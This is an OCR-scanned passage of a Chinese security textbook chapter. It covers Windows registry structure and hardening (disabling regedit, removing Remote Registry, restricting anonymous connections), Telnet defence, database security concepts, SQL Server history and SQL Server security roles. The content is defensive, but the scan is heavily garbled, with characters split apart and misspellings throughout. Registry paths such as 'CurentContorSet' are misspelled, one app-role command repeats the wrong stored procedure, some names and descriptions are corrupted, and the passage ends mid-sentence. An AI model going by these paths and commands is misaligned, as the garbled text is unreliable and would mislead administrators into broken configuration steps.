中 存在 某 个 键 或 值 , 则 对 应 的 键 或 值 将 出 现在 HREY_CLASSES_ ROOT 
中 。 如 果 两 处 均 存 键 或 值 ， HKEY CURRENT _USER 版 本 将 是 出 现在 
HKEY CLASSES ROOT 中 的 一 个 

包含 当前 以 交互 方式 (与 远程 方式 相反 ) 登 录 的 用 户 的 用 户 配置 文件 ， 包 
括 环境 变量 、 桌 面 设 置 、 网 络 连接 、 打 印 机 和 程序 首选 项 。 该 子 目 录 树 
是 HRKEY USERS 子 目 录 的 别名 , 并 指向 HREY USERS\ 当 前 用 户 的 安 
全 ID 


HKEY _ LOCAL MACHINE 


HKEY_CLASSES ROOT 


加 
: 
材 
计 
算 
机 
系 
列 


HKEY _ CURRENT USER 


加 移 3 重 起 给 摇 多 与 益 病 庄 安 全 


续 表 


说 明 


HKEY USERS 


包含 关于 动态 加 载 的 用 户 配 置 文 件 和 默认 配置 文件 的 信息 .包含 同时 出 
现在 HKEY_CURRENT_USER 中 的 信息 。 要 远程 访问 服务 器 的 用 户 在 
服务 器 上 的 该 项 下 没有 配置 文件 , 他 们 的 配置 文件 将 加 载 到 他 们 自己 的 
计算 机 的 注册 表 中 


HKEY CURRENT CONFIG 


数据 类 型 


REG BINARY 


REG DWORD 


REG EXPAND SZ 


REG MULTI SZ 


REG SZ 
REG FULL RESOU 
RCE_DESCRIPTOR 


包含 在 启动 时 由 本 地 计算 机 系统 使 用 的 硬件 配置 文件 的 相关 信息 。 该 信 
息 用 于 配置 一 些 设置 , 如 要 加 载 的 设备 驱动 程序 和 显示 时 要 使 用 的 分 辩 
率 。 该 子 目录 树 是 HREY_ LOCAL MACHINE 子 目 录 树 的 一 部 分 ， 并 
指向 HEKY LOCAL MACHINE\SYSTEM\CurentContorSet\HardwareProfiles\ 
Current 


表 3-2 注册 表 数 据 类 型 说 明 


说 阴 
未 处 理 的 二 进 制 数据 。 二 进 制 是 没有 长 度 限制 的 ， 可 以 是 任意 个 字 节 的 长 度 。 
多 数 硬件 组 件 信 息 都 以 二 进 制 数 据 存储 , 而 以 十 六 进 制 格式 显示 在 注册 表 编 辑 
器 中 。 如 “CustomColors ”的 键 值 就 是 一 个 二 进 制 数据 , 双击 键 值 名 ， 出现“ 编 
辑 二 进 制 数值 ”对 话 框 
数据 由 4 字 节 (32 位 ) 长 度 的 数 表示 。 许多 设备 驱动 程序 和 服务 的 参数 都 是 这 种 
类 型 ， 并 在 注册 表 编 辑 器 中 以 二 进 制 、 十 六 进 制 或 十 进 制 的 格式 显示 
长 度 可 变 的 数据 串 ， 一 般 用 来 表示 文件 的 描述 、 硬 件 的 标识 等 ， 通 常 由 字母 和 
数字 组 成 ， 最 大 长 度 不 能 超过 255 个 字符 
多 个 字符 串 。 其 中 格式 可 被 用 户 读 取 的 列表 或 多 值 。 常 用 空格 、 去 号 或 其 他 标 
记分 开 
固定 长 度 的 文本 串 
设计 用 来 存储 硬件 元 件 或 驱动 程序 的 资源 列表 的 一 系列 嵌 套 数组 


由 于 入 侵 者 可 以 通过 注册 表 来 种 植木 马 、 修 改 软件 信息 ， 甚 至 删除 、 停 用 或 改变 硬件 
的 工作 状态 ， 因 此 对 注册 表 的 防护 就 显得 尤其 重要 。 可 以 通过 以 下 两 种 方法 增强 注册 表 的 


安全 性 。 


1. 禁止 使 用 注册 表 编 辑 器 

入 侵 者 通常 是 通过 远程 登录 “注册 表 编辑 器 ”修改 注册 表 的 ， 可 以 通过 修改 注册 表 设 
置 禁止 注册 表 编 辑 器 。 打 开 “ 注 册 表 编辑 器 ”窗口 ， 从 左 侧 栏 中 依次 展开 
“HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\System” 了 了 
项 ， 在 右 侧 栏 中 找到 或 新 建 一 个 DWORD 值 类 型 的 名 为 “Disableregistrytools” 的 选项 ， 将 
其 值 改 为 1。 关 闭 注 册 表 ， 再 次 打开 注册 表 编 辑 器 时 ， 将 会 弹出 禁止 修改 的 提示 框 。 
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然而 禁止 别人 使 用 注册 表 编 辑 器 的 同时 ， 自 己 也 没 法 使 用 了 ， 可 以 通过 以 下 方法 恢复 
禁用 的 注册 表 编 辑 器 。 

方法 一 : 打开 一 个 “记事 本 ”文件 ， 如 果 计 算 机 的 操作 系统 是 Windows 2000\XP， 在 
其 中 输入 如 下 代码 。 


Windows Registry Editor Version 5.00 

[HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\Sy 
stem] 

"Disableregistrytools"=dword:00000000 

如 果 操 作 系 统 是 Windows98 或 Windows95， 则 输入 如 下 文字 : 

REGEDIT4 

[HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\Sy 
stem] 


"Disableregistrytools"=dword:00000000 


将 文件 保存 为 名 为 “Unlock.reg” 的 注册 表 文 件 。 双 击 运行 该 文件 ， 即 可 将 该 文件 导入 
到 注册 表 中 ， 然 后 使 用 常规 打开 注册 表 编 辑 器 的 方法 就 可 以 重新 打开 注册 表 编 辑 器 了 。 

方法 二 : 在 Windows 2000\XP\2003 系统 中 ， 从 “开始 ”菜单 中 选择 “运行 ”， 在 弹出 
的 “运行 ”对 话 框 中 输入 “Gpedit.msc”， 单 击 “ 确 定 ” 按 钮 ， 即 可 弹出 “组 策略 ”对 话 框 
( 见 图 3-7 所 示 )。 从 左 侧 栏 中 依次 选择 “用 户 配置 ”一 “管理 模板 ”一 “系统 ”选项 ， 在 右 
侧 栏 中 双击 “阻止 访问 注册 表 编 辑 工具 ”， 可 以 打开 “阻止 访问 注册 表 编 辑 工具 属性 ”对 
话 框 ， 选 中 “已 禁用 ” 单 选 按钮 ， 单 击 “ 确 定 ” 按 钮 ， 即 可 恢复 禁用 的 注册 表 编 辑 器 ， 
如 图 3-8 所 示 。 
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3-8 “阻止 访问 注册 表 编辑 工具 属性 ”对 话 框 

2. 删除 “远程 注册 表 服 务 ”(Remote Registry Service) 

入 侵 者 远程 入 侵 注 册 表 需要 启用 “远程 注册 表 服 务 ”， 因 此 为 了 阻止 黑客 的 入 侵 ， 可 
以 将 该 服务 删除 。 方 法 是 找到 注册 表 中 HKEY_LOCAL MACHINE\SYSTEM\CurrentContorSet\ 
Services 下 的 RemoteRegistry 项 ， 在 其 上 右 击 ， 选 择 “删除 ” 选项 ， 将 该 项 删除 后 就 无 法 启 
动 该 服务 了 ， 即 使 我 们 通过 在 “控制 面板 ”一 “管理 工具 ”一 “服务 ”中 启动 也 会 出 现 相 
应 的 错误 提示 ， 根 本 无 法 启动 该 服务 。 

不 过 需要 注意 的 是 ， 对 于 注册 表 的 修改 一 定 要 谨慎 ， 在 修改 前 一 定 要 将 该 项 信息 导出 
并 保存 。 以 后 再 想 使 用 该 服务 时 只 需 将 已 经 保存 的 注册 表 文 件 导 入 即 可 。 另 外 如 果 觉 得 将 
服务 删除 不 安全 的 话 还 可 以 将 其 改名 ， 也 可 以 起 到 一 定 的 防护 作用 。 


3.2.4 Telnet 入 侵 的 防护 方法 


Telnet 用 于 Interet 的 远程 登录 , 它 可 以 使 用 户 坐 在 已 上 网 的 计算 机 前 通过 网 络 进入 另 
一 台 已 上 网 的 计算 机 ， 使 它们 相互 通信 ， 这 种 连通 可 以 发 生 在 同一 房间 里 的 计算 机 或 是 在 
世界 各 范围 内 已 上 网 的 计算 机 。 习 惯 来 说 ， 被 连通 并 且 为 网 路 上 所 有 用 户 提供 服务 的 计算 
机 称 为 服务 器 (Servers)， 而 自己 正在 使 用 的 机 器 称 为 客户 机 (Customer)。 一 旦 连通 后 ， 客 户 
机 可 以 享有 服务 器 所 提供 的 一 切 服 务 。 用 户 可 以 运行 通常 的 交互 过 程 ( 注 册 进 入 、 执 行 命 
令 )， 也 可 以 进入 很 多 特殊 的 服务 器 ， 如 寻找 图 书 索引 。 网 上 不 同 的 主机 提供 的 各 种 服务 都 
可 以 被 使 用 。 
Telnet 可 以 用 于 进行 各 种 各 样 的 入 侵 活 动 ， 或 者 用 来 剔除 远程 主机 发 送 来 的 信息 。 在 
运行 网 络 并 为 用 户 提供 Telnet 服务 时 , 还 是 小 心 点 为 好 , 尤其 对 那些 新 建 的 Telnet 服务 器 ， 
其 中 可 能 含有 未 被 发 现 的 “臭虫 bug)”。 同 时 ， 因 为 Telnet 具有 很 强 的 交互 性 并 且 向 用 户 
提供 了 在 远程 主机 上 执行 命令 的 功能 ，Telnet 上 的 任何 漏洞 都 可 能 是 致命 的 。 在 这 一 点 上 
至 少 同 FTP 和 HITP 一 样 ， 甚 至 还 会 更 糟 。 一 旦 入 侵 者 与 远程 主机 建立 了 Telnet 连接 ， 入 
侵 者 便 可 以 使 用 目标 主机 上 的 软 硬 件 资源 ， 而 入 侵 者 的 本 地 机 只 相当 于 一 个 只 有 键盘 和 显 
示 器 的 终端 而 已 。 

Telnet 的 入 侵 对 计算 机 的 危害 性 比较 大 ， 为 了 防止 黑客 通过 Telnet 入 侵 计算 机 ， 我 们 
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通常 会 禁用 Telnet 服务 。 然 而 入 侵 者 可 以 先 与 远程 计算 机 建立 空 连接 , 然后 远程 开启 Telnet 
服务 。 因 此 防护 Telnet 入 侵 ， 除 了 禁用 Telnet 服务 之 外 ， 还 要 防范 IPC 漏洞 ， 禁 用 建立 空 
连接 , 首先 运行 regedit, 打开 注册 表 编 辑 器 , 找到 子 项 : HREY LOCAL MACHINE\SYSTEM\ 
CurrentContorSet\Control\LSA， 把 RestrictAnonymous=DWORD 的 键 值 改 为 : 00000001 。 


3.3 SQL 数据库 安全 


数据 库 在 各 种 系统 中 都 应 用 的 非常 广泛 , 在 本 地 网 的 网 管 系统 中 更 是 系统 的 关键 部 分 ， 
在 办 公 自 动 化 系统 、 管 理 信息 系统 及 电子 商务 中 ， 数 据 库 都 是 重要 的 组 成 部 分 ， 因 此 ， 往 
往 成 为 非法 入 侵 者 攻击 的 焦点 。 如 何 保证 和 加 强 数 据 库 的 安全 性 、 保 密 性 ， 己 成 为 数据 库 
管理 员 关 心 的 首要 问题 之 一 。 


3.3.1 数据 库 系统 概述 


数据 库 系统 ， 一 般 可 以 理解 成 两 部 分 : 一 部 分 是 数据 库 ， 按 一 定 的 方式 存 取 数 据 ; 另 
一 部 分 是 数据 库 管理 系统 IDBMS)， 为 用 户 及 应 用 程序 提供 数据 访问 , 并 具有 对 数据 库 进 行 
管理 、 维 护 等 多 种 功能 。 

1. 数据 库 系 统 安全 

包含 以 下 两 层 含义 。 

第 一 层 是 指 系统 运行 安全 ， 它 包含 : 法律、 政策 的 保护 ， 如 用 户 是 否 有 合法 权利 、 政 
策 是 否 允 许 等 ， 物 理 控制 安全 ， 如 机 房 加 锁 等 ， 硬 件 运 行 安全 ;， 操 作 系 统 安全 ， 如 数据 文 
件 是 否 保护 等 ;， 灾害 、 故 障 恢复 ， 死 锁 的 避免 和 解除 ， 电 磁 信 息 泄露 防止 。 

第 二 层 是 指 系 统 信息 安全 ， 它 包括 : 用 户口 令 字 鉴 别 ; 用户 存 取 权限 控制 ， 数 据 存 取 
权限 、 方 式 控制 ， 审 计 跟 踪 ， 数 据 加 密 。 

2. 数据 库 系 统 安全 特性 


1) ”数据 独立 性 

数据 独立 于 应 用 程序 之 外 。 理 论 上 数据 库 系 统 的 数据 独立 性 分 为 以 下 两 种 。 

(1) 物理 独立 性 。 

数据 库 的 物理 结构 的 变化 不 影响 数据 库 的 应 用 结构 ， 从 而 也 就 不 能 影响 其 相应 的 应 用 
程序 。 这 里 的 物理 结构 是 指数 据 库 的 物理 位 置 、 物 理 设备 等 。 

(2) 逻辑 独立 性 。 

数据 库 逻 辑 结构 的 变化 不 会 影响 用 户 的 应 用 程序 ， 数 据 类 型 的 修改 、 增 加 、 改 变 各 表 
之 间 的 联系 都 不 会 导致 应 用 程序 的 修改 。 

这 两 种 数据 独立 性 都 要 靠 DBMS 来 实现 。 到 目前 为 止 ， 物 理 独 立 性 已 经 能 基本 实现 ， 
但 逻辑 独立 性 实现 起 来 非常 困难 ， 数 据 结构 一 旦 发 生变 化 ， 一 般 情 况 下 相应 的 应 用 程序 都 
要 作 或 多 或 少 的 修改 。 追 求 这 一 目标 也 成 为 数据 库 系 统 结构 复杂 的 一 个 重要 原因 。 

2) ”数据 安全 性 

一 个 数据 库 能 否 实现 防止 无 关 人 员 得 到 他 不 应 该 知道 的 数据 ， 是 数据 库 是 否 实用 的 一 
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个 重要 指标 。 如 果 一 个 数据 库 对 所 有 的 人 都 要 公开 数据 ， 那 么 这 个 数据 库 就 不 是 一 个 可 靠 
的 数据 库 。 一 般 情况 下 ， 比 较 完整 的 数据 库 对 数据 安全 性 采取 以 下 措施 。 

(1) 将 数据 库 中 需要 保护 的 部 分 与 其 他 部 分 相隔 离 。 

(2) 使 用 授权 规则 。 这 是 数据 库 系统 经 常 使 用 的 一 个 办 法 ， 数 据 库 给 用 户 ID 号 和 口 
令 、 权 限 。 当 用 户 用 此 ID 号 和 口令 登录 后 ， 就 会 获得 相应 的 权限 。 不 同 的 用 户 或 操作 会 有 
不 同 的 权限 。 比 如 ， 对 于 一 个 表 ， 某 人 有 修改 权 ， 而 其 他 人 只 有 查询 权 。 

(3) 将 数据 加 密 ， 以 密 文 的 形式 存 于 数据 库 内 。 

3) ”数据 的 完整 性 

数据 完整 性 这 一 术语 用 来 泛 指 与 损坏 和 丢失 相对 的 数据 状态 。 它 通常 标明 数据 在 可 靠 
性 与 准确 性 上 是 可 信赖 的 ， 同 时 也 意味 着 数据 有 可 能 是 无 效 的 或 不 完整 的 。 数 据 完 整 性 包 
括 数据 的 正确 性 、 有 效 性 和 一 致 性 。 

(1) 正确 性 。 

数据 在 输入 时 要 保证 其 输入 值 与 定义 这 个 表 时 相应 的 域 的 类 型 一 致 。 如 表 中 的 某 个 字 
段 为 数值 型 ， 那 么 它 只 能 允许 用 户 输入 数值 型 的 数据 ， 否 则 不 能 保证 数据 库 的 正确 性 。 

(2) 有 效 性 。 

在 保证 数据 正确 的 前 提 下 ， 系 统 还 要 约束 数据 的 有 效 性 。 例 如 :; 对 于 月 份 字段 ， 若 输 
入 值 为 0， 那 么 这 个 数据 就 是 无 效 数据 ， 这 种 无 效 输入 也 称 为 “垃圾 输入 ”。 当 然 ， 若 数 
据 库 输出 的 数据 是 无 效 的 ， 相 应 称 为 “垃圾 输出 ”。 

(3) 一 致 性 。 

当 不 同 的 用 户 使 用 数据 库 ， 应 该 保证 他 们 取出 的 数据 必须 一 致 。 因 为 数据 库 系 统 对 数 
据 的 使 用 是 集中 控制 的 ， 因 此 数据 的 完整 性 控制 还 是 比较 容易 实现 的 。 

4) ”并 发 控制 

如 果 数 据 库 应 用 要 实现 多 用 户 共 享 数 据 ， 就 可 能 在 同一 时 刻 多 个 用 户 要 存 取 数 据 ， 这 
种 事件 叫做 并 发 事件 。 当 一 个 用 户 取出 数据 进行 修改 ， 在 修改 存 入 数据 库 之 前 如 有 其 他 用 
户 再 取 此 数据 ， 那 么 读 出 的 数据 就 是 不 正确 的 。 这 时 就 需要 对 这 种 并 发 操作 实行 控制 ， 排 
除 和 避免 错误 的 发 生 ， 保 证 数据 的 正确 性 。 

5) ”故障 恢复 

当 数 据 库 系统 在 运行 中 出 现 物理 或 逻辑 上 的 错误 时 ， 如 何 尽快 将 它 恢复 正常 ， 这 就 是 
数据 库 系统 的 故障 恢复 功能 。 


3.3.2 ”SQL 服务 器 的 发 展 


1970 年 6 月 ，E.F.Dodd 博士 发 表 “A Relational Mode of Data for Large Shared Data 
Banks” 论文 , 提出 关系 模型 。1979 年 6 月 12 日 ，Oracle 公司 (当时 还 叫 Relational Software) 
发 布 了 第 一 个 商用 SQL 关系 数据 库 。1987 年 Microsoft、Sybase 和 Ashton-Tate 3 家 公司 共 
同 开 发 了 Sybase SQL Server。1988 年 ， Microsoft、Sybase 和 Ashton-Tate 3 家 公司 把 该 产品 
移植 到 OS\2 上 。 后 来 Aston-Tate 公司 退出 了 该 产品 的 开发 ， 而 Microsoft 公司 和 Sybase 公 
司 则 签署 了 一 项 共同 开发 协议 ， 这 两 家 公司 的 共同 开发 的 结果 是 发 布 了 用 于 Windows NT 
操作 系统 的 SQL Server。1993 年 ， 将 SQL Server 移植 到 了 Windows NT 3.1 平台 上 ， 即 微 
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软 SQL Server 4.2 版 本 发 布 。 在 SQL Server 4 版 本 发 行 后 ，Microsoft 公司 和 Sybase 公司 在 
SQL Server 的 开发 方面 分 道 扬 久 ， 取 消 了 合同 ， 各 自 开发 自己 的 SQL Server。Microsoft 公 
司 专 注 于 Windows NT 平台 上 的 SQL Server 开发 , 而 Sybase 公司 则 致力 于 UNIX 平台 上 的 
SQL Server 开发 。 SQL Server 6.0 版 本 是 第 一 个 完全 由 Microsoft 公司 开发 的 版 本 。1996 年 ， 
Microsoft 公司 推出 了 SQL Server 6.5 版 本 ， 接 着 在 1998 年 又 推出 了 具有 巨大 变化 的 SQL 
Server 7.0 版 ， 这 一 版 本 在 数据 存储 和 数据 库 引擎 方面 发 生 了 根本 性 的 变化 。 又 经 过 两 年 的 
努力 开发 ，Microsoft 公司 于 2000 年 9 月 发 布 了 SQL Server 2000， 其 中 包括 企业 版 、 标 准 
版 、 开 发 版 、 个 人 版 4 个 版 本 。 从 SQL Server 7.0 到 SQL Server2000 的 变化 是 渐进 的 ， 没 
有 从 6.5 到 7.0 变化 那么 大 ,只 是 在 SQL Server 7.0 的 基础 上 进行 了 增强 。2005 年 微软 又 发 
布 了 SQL Server 2005 产品 ， 该 产品 包括 企业 版 、 标 准 版 、 工 作 组 版 、 精 简 版 4 个 版 本 。 


3.3.3 ”数据 库 技术 的 基本 概念 


数据 库 技术 是 一 种 计算 机 辅助 管理 数据 的 方法 ， 它 研究 如 何 组 织 和 存储 数据 ， 如 何 高 
效 地 获取 和 处 理 数据 。 

数据 库 技术 产生 于 20 世纪 60 年 代 末 70 年 代 初 , 其 主要 目的 是 有 效 地 管理 和 存 取 大 量 
的 数据 资源 ， 数 据 库 技术 主要 研究 如 何 存储 、 使 用 和 管理 数据 。 

数据 库 技 术 应 用 中 ， 经 常用 到 的 基本 概念 有 : 数据 库 (DB)、 数 据 库 管理 系统 (DBMS)、 
数据 库 系 统 (DBS)、 数 据 库 技术 及 数据 模型 。 

1. 数据 库 (DB) 

数据 库 是 长 期 存储 在 计算 机 内 、 有 组 织 的 、 统 一 管理 的 相关 数据 的 集合 。 数 据 库 能 为 
各 种 用 户 共享 ， 具 有 较 小 匈 余 度 、 数 据 间 联系 紧密 而 又 有 较 高 的 数据 独立 性 。 

2. 数据 库 管理 系统 (DBMS) 

数据 库 管 理 系 统 是 位 于 用 户 与 操作 系统 (OS) 之 间 的 一 层 数据 管理 软件 ， 它 为 用 户 或 应 
用 程序 提供 访问 数据 库 的 方法 ， 包 括 数据 库 的 建立 、 查 询 、 更 新 及 各 种 数据 控制 等 。 

3. 数据 库 系 统 (DBS) 

数据 库 系 统 是 实现 有 组 织 地 、 动 态 地 存储 大 量 关 联 数据 、 方 便 多 用 户 访问 的 计算 机 硬 
软件 和 数据 资源 组 成 的 系统 ， 即 它 是 采用 数据 库 技术 的 计算 机 系统 。 

4. 数据 库 技术 

数据 库 技术 是 研究 数据 库 的 结构 、 存 储 、 设 计 、 管 理 和 使 用 的 一 门 软件 学 科 。 

5. 数据 模型 

模型 是 对 现实 世界 的 抽象 。 在 数据 库 技术 中 ， 我 们 用 模型 的 概念 描述 数据 库 的 结构 与 
语义 ， 对 现实 世界 进行 抽象 。 

数据 模型 是 能 表示 实体 类 型 及 实体 间 联 系 的 模型 。 

数据 模型 的 种 类 很 多 ， 目 前 被 广泛 使 用 的 可 分 为 两 种 类 型 。 

一 种 是 独立 于 计算 机 系统 的 数据 模型 ， 完 全 不 涉及 信息 在 计算 机 中 的 表示 ， 只 是 用 来 
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描述 某 个 特定 组 织 所 关心 的 信息 结构 ， 这 类 模型 称 为 “概念 数据 模型 ”。 概 念 模型 是 按 用 
户 的 观点 对 数据 建 模 ， 强 调 其 语义 表达 能 力 ， 概 念 应 该 简单 、 清 晰 、 易 于 用 户 理解 ， 它 是 
对 现实 世界 的 第 一 层 抽 象 ， 是 用 户 和 数据 库 设 计 人 员 之 间 进 行 交流 的 工具 。 这 一 类 模型 中 
最 著名 的 是 “实体 联系 模型 ”。 

另 一 种 数据 模型 是 直接 面向 数据 库 的 逻辑 结构 ， 它 是 对 现实 世界 的 第 二 层 抽 象 。 这 类 
模型 直接 与 数据 库 管 理 系统 有 关 ， 称 为 “逻辑 数据 模型 ”， 一 般 又 称 为 “结构 数据 模型 ”。 
例如 层次 、 网 状 、 关 系 、 面 向 对 象 等 模型 。 这 类 模型 有 严格 的 形式 化 定义 ， 以 便于 在 计算 
机 系统 中 实现 。 它 通常 有 一 组 严格 定义 的 无 二 义 性 语法 和 语义 的 数据 库 语言 ， 人 们 可 以 用 
这 种 语言 来 定义 、 操 纵 数据 库 中 的 数据 。 

结构 数据 模型 应 包含 数据 结构 、 数 据 操作 和 数据 完整 性 约束 三 个 部 分 

(1) 数据 结构 是 指 对 实体 类 型 和 实体 间 联 系 的 表达 和 实现 。 

(2) 数据 操作 是 指 对 数据 库 的 检索 和 更 新 (包括 插入 、 删 除 和 修改 ) 两 类 操作 。 

(3) 数据 完整 性 约束 给 出 数据 及 其 联系 应 具有 的 制约 和 依赖 规则 。 


3.3.4 SQL 安全 原理 


在 研究 SQL Server 攻击 和 防守 前 ,应 该 熟悉 基本 的 SQL Server 安全 原理 。 一 旦 认识 到 
哪个 安全 基础 结构 正 被 使 用 ， 就 会 更 好 地 理解 每 个 攻击 或 防守 。SQL Server 支持 三 级 安全 
层次 ， 这 种 三 层次 的 安全 结构 与 Windows 安全 结构 相似 ， 因 此 Windows 安全 知识 也 适用 
于 SQL Server。 

1. 第 一 级 安全 层次 


服务 器 登录 是 SQL Server 认证 体系 的 第 一 道 关 ， 用 户 必 须 登 录 到 SQL Server， 或 者 已 
经 成 功 登 录 了 一 个 映射 到 SQL Server 的 系统 账号 。SQL Server 有 两 种 服务 器 验证 模式 ; 
Windows 安全 模式 和 混合 模式 。 如 果 选 择 的 是 Windows 安全 模式 ， 并 把 Windows 用 户 登 
录 映 射 到 了 SQL Server 登录 上 ， 那 么 合法 的 Windows 用 户 也 就 连 到 了 SQL Server 上 ， 不 
是 Windows 合法 用 户 的 用 户 则 不 能 连接 到 SQL Server 上 。 在 混合 模式 中 ，Windows 用 户 
访问 Windows 和 SQL Server 的 方式 与 Windows 安全 模式 相同 ， 而 一 个 非法 的 Windows 用 
户 则 可 以 通过 合法 的 用 户 名 和 口令 访问 SQL Server( 当 然 ， 合 法 的 Windows 用 户 也 可 以 通 
过 其 他 合法 的 用 户 名 和 口令 ， 但 不 通过 Windows 登录 而 访问 SQL Server)。 除 非 必须 适用 
混合 模式 ， 否 则 建议 使 用 Windows 安全 模式 。 

为 方便 服务 器 管理 ， 每 个 SQL Server 有 多 个 内 置 的 服务 器 角色 ， 人 允许 系统 管理 员 可 信 
的 实体 授予 一 些 功能 ， 而 不 必 使 它们 成 为 完全 的 管理 员 。 服 务 器 中 的 一 些 角 色 如 表 3-3 
所 示 。 


表 3-3 服务 器 角色 及 其 主要 功能 
服务 器 角色 
sysadmin 
securityadmin 


描 述 
可 以 执行 SQL Server 中 的 任何 任务 
可 以 管理 谷 录 
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续 表 
服务 器 角色 描 述 
serveradmin 可 以 设置 服务 器 选项 (sp_configure) 
setupadmin 可 以 设置 连接 服务 器 ， 运 行 sp_serveroption 
processadmin 管理 服务 器 上 的 进程 (有 能 力 取消 连接 ) 
diskadmin 可 以 管理 磁盘 文件 
dbcreator 可 以 创建 、 管 理 数据 库 
bulkadmin 可 以 执行 BULk INSERT 指令 


2. 第 二 级 安全 层次 

它 控 制 用 户 与 一 个 特定 的 数据 库 的 连接 。 在 SQL Server 上 登录 成 功 并 不 意味 着 用 户 已 
经 可 以 访问 SQL Server 上 的 数据 库 ， 还 需要 数据 库 用 户 是 实际 被 数据 库 授予 权限 的 实体 。 
当 数 据 库 所 有 者 (db_owner，dbo) 创 建 了 新 的 存储 过 程 ， 它 将 为 数据 库 用 户 或 角色 的 存储 过 
程 分 配 执行 权限 ， 而 不 是 登录 。 数 据 库 用 户 从 概念 上 与 操作 系统 用 户 是 完全 无 关 的 ， 但 是 
在 实际 使 用 中 把 它们 对 应 起 来 可 能 比较 方便 ， 但 不 是 必须 的 。 

3. 第 三 级 安全 层次 

它 允 许 用 户 拥有 对 指定 数据 库 中 一 个 对 象 的 访问 权限 ， 由 数据 库 角色 来 定义 。 用 户 定 
义 的 角色 可 以 更 加 方便 地 为 用 户 创建 的 对 象 、 固 定 的 角色 和 合适 的 应 用 角色 分 配 权限 。 

1) 用 户 定义 的 角色 

用 户 定义 的 角色 与 Windows 认证 中 的 组 类 似 。 每 个 用 户 可 以 是 一 个 或 多 个 用 户 定义 的 
数据 角色 中 的 成 员 ， 可 以 直接 应 用 于 如 表单 或 存储 过 程 等 系统 对 象 。 强 烈 建议 把 权限 分 配 
给 角色 而 不 是 用 户 ， 因 为 这 将 极 大 地 方便 分 配 权限 ， 从 而 极 少 导致 错误 。 

2) 固定 数据 库 角色 

固定 数据 库 角 色 允 许 数据 库 所 有 者 (dbo) 赋 予 一 些 用 户 授权 能 力 ， 方 便 管 理 ， 抑 制 一 些 
用 户 过 多 的 权限 。 强 烈 推 荐 管理 员 和 数据 库 所 有 者 经 常 检查 这 些 组 的 成 员 资格 ， 确 保 没 有 
用 户 被 给 予 了 不 应 得 的 权限 。 参 考 表 3-4 中 的 数据 库 角 色 ， 以 及 对 角色 主要 功能 和 权限 的 

表 3-4 数据 库 角色 及 其 主要 功能 

描 述 

可 以 执行 所 有 数据 库 角 色 的 活动 
[以 增加 或 删除 windows 组 、 用 户 和 数据 库 中 的 SQL Server 用 户 
可 以 阅读 数据 库 中 所 有 用 户 表 的 数据 


固定 数据 库 角色 
db _ owner 
db_accessadmin 
db_datareader 


了 


| 


| 


db_datawriter 可 以 写 或 删除 数据 库 中 所 有 用 户 表 的 数据 
db_ddladmin 可 以 增加 、 修 改 或 放弃 数据 库 的 对 象 
db _securityadmin 可 以 管理 角色 和 数据 库 角 色 的 成 员 ， 管 理 数据 库 的 参数 和 对 象 权限 


可 以 备份 数据 库 


| 


db backupoperator 


MEEEDS EE 


续 表 
固定 数据 库 角色 
db denydatareader 


不 能 选择 数据 库 的 数据 
不 能 改变 数据 库 的 数据 


应 用 角色 是 专门 为 下 面 的 应 用 程序 设计 的 ， 即 当 用 户 访问 SQL Server， 使 用 特别 的 应 
程序 时 ， 和 希望 用 户 拥 有 更 大 的 权限 访问 ， 而 又 不 想 授予 单独 的 用 户 权限 ， 因 为 如 果 许 可 
某 个 用 户 访问 SQL Server 表 ， 就 不 能 控制 这 些 用 户 连 接 到 SQL Server 的 方式 , 阻止 他 们 以 
自己 从 没 想 过 的 方法 访问 数据 。 因 此 ， 要 解决 这 个 问题 ， 需 要 创建 一 个 应 用 程序 角色 ， 然 
后 在 执行 需要 提高 权限 的 功能 时 ， 让 应 用 程序 切换 到 那个 角色 。 接 着 确保 当 通过 此 应 用 程 
序 时 ， 用 户 只 能 执行 期 望 的 功能 。 

通过 使 用 sp_addapprole， 首 先 创 建 数据 库 角 色 执 行 这 个 功能 ， 如 : exec sp_addapprole 

“app role name”，“strong password”。 应 用 程序 接着 发 布 命令 ， 切 换 安全 环境 到 应 下 
角色 (假定 以 加 密 表单 的 形式 给 SQL Server 发 送 密码 ): exec sp_addapprole “app_role name”， 
{EncryptN “strong password” }, ‘odbc” 。 

为 了 记录 ， 这 个 特性 只 应 考虑 在 小 应 用 程序 中 作为 最 后 的 手段 。 比 如 ， 如 果 只 希望 用 
户 做 一 些 他 们 一 般 不 能 在 应 用 程序 中 做 的 事情 , 知道 创建 不 需要 数据 访问 的 存储 过 程 即 可 。 
如 果 存 储 过 程 由 一 个 用 户 所 有 (经 常设 定 为 dbo), 并 没有 合适 的 权限 级 别 , 不 包含 任何 exec 
参数 ， 则 用 户 将 可 以 执行 存储 过 程 来 访问 需要 的 功能 。 这 是 更 可 控 的 方法 ， 不 需要 证 书 
编码 。 


db denydatawriter 


3.4 SQL Server 攻击 的 防护 


微软 的 SQL Server 是 一 种 广泛 使 用 的 数据 库 ， 很 多 电子 商务 网 站 、 企 业内 部 信息 化 平 
台 等 都 是 基于 SQL Server 的 ,但 是 数据 库 的 安全 性 还 没有 被 人 们 和 系统 的 安全 性 等 同 起 来 ， 
多 数 管理 员 认为 只 要 把 网 络 和 操作 系统 的 安全 做 好 了 ， 那 么 所 有 的 应 用 程序 也 就 安全 了 。 
大 多 数 系统 管理 员 对 数据 库 不 熟悉 ， 而 数据 库 管理 员 又 对 安全 问题 关心 太 少 ， 而 且 一 些 安 
全 公司 也 忽略 数据 库 安 全 ， 这 就 使 数据 库 的 安全 问题 更 加 严峻 了 。 数 据 库 系统 中 存在 的 安 
全 漏洞 和 不 当 的 配置 通常 会 造成 严重 的 后 果 ， 而 且 都 难以 发 现 。 数 据 库 应 用 程序 通常 同 操 
作 系 统 的 最 高 管理 员 密切 相关 。 广 泛 的 SQL Server 数据 库 又 是 属于 “端口 ”型 的 数据 库 ， 
这 就 表示 任何 人 都 能 够 用 分 析 工 具 试 图 连接 到 数据 库 上 ， 从 而 绕 过 操作 系统 的 安全 机 制 ， 
进而 疤 入 系统 、 破 坏 和 窃取 数据 资料 ， 甚 至 破坏 整个 系统 。 


3.4.1 信息 资源 的 收集 


在 讨论 如 何 防范 攻击 者 之 前 ， 必 须要 了 解 攻击 者 如 何 查 找 和 渗透 SQL Server 或 基于 
SQL Server 的 应 用 程序 。 

攻击 者 可 能 有 许多 原因 来 选择 潜在 的 目标 ， 包 括 报 复 、 利 益 或 恶意 。 永 远 不 要 假定 自 
